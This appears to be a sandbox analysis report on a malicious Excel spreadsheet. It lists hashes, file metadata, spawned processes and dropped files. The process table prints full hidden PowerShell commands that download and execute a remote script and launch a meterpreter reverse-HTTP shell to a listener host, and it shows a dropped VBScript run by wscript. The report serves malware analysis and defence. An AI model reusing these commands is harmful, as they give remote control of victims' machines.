| Field | Value |
|---|---|
| File name | 85349fef3d4babee2eec284ff6e7756947116a6e484b867d996d3dca0920bd13.xls |
| Full analysis | https://app.any.run/tasks/c77116d1-8f2d-4859-9793-cd8f3aaff9a3 |
| Verdict | Malicious activity |
| Analysis date | May 24, 2019, 01:55:04 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/vnd.ms-excel |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Itamar Dahan, Last Saved By: Itamar Dahan, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu May 23 14:05:54 2019, Last Saved Time/Date: Thu May 23 14:05:56 2019, Security: 0 |
| MD5 | DD035658DDDEF77D73FA81BD1ABE4DA4 |
| SHA1 | 6E16FE5511C53B4915A609C3381FD74E398140E9 |
| SHA256 | 85349FEF3D4BABEE2EEC284FF6E7756947116A6E484B867D996D3DCA0920BD13 |
| SSDEEP | 768:sP1k3hbdlylKsgqopeJBWhZFGkE+cL2NdAJ6WN1J3csDj4vNo:41k3hbdlylKsgqopeJBWhZFGkE+cL2NC |
| Extension | Type identification |
|---|---|
| .xls | Microsoft Excel sheet (48) |
| .xls | Microsoft Excel sheet (alternate) (39.2) |
| Property | Value |
|---|---|
| CompObjUserType | Microsoft Excel 2003 Worksheet |
| CompObjUserTypeLen | 32 |
| HeadingPairs | |
| TitleOfParts | Sheet1 |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 16 |
| Company | - |
| CodePage | Windows Latin 1 (Western European) |
| Security | None |
| ModifyDate | 2019:05:23 13:05:56 |
| CreateDate | 2019:05:23 13:05:54 |
| Software | Microsoft Excel |
| LastModifiedBy | Itamar Dahan |
| Author | Itamar Dahan |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 1892 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 |
| 2620 | powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('10.110.1.10')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 10.110.1.15 -Lport 8080 -Force | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 1584 | wscript C:\Users\Public\config.vbs | C:\Windows\system32\wscript.exe | — | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
| 2864 | "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('10.110.1.10')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 10.110.1.15 -Lport 8080 -Force | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 1892 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR4019.tmp.cvr | — | — | — |
| 1892 | EXCEL.EXE | C:\Users\Public\config.txt | — | — | — |
| 2620 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z6WQFT0U55396GT6A2CN.temp | — | — | — |
| 2864 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JR66TJOFR509WYTN1E6G.temp | — | — | — |
| 2620 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
| 2620 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1349ce.TMP | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
| 1892 | EXCEL.EXE | C:\Users\Public\config.vbs | text | EE44198577A8E6A2B6D69A3A1A23D821 | 7C6405053392E07489DDDB85AAE3A3CAADA0C71393EC474D66D4F89878385C1F |
| 2864 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134b74.TMP | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
| 2864 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |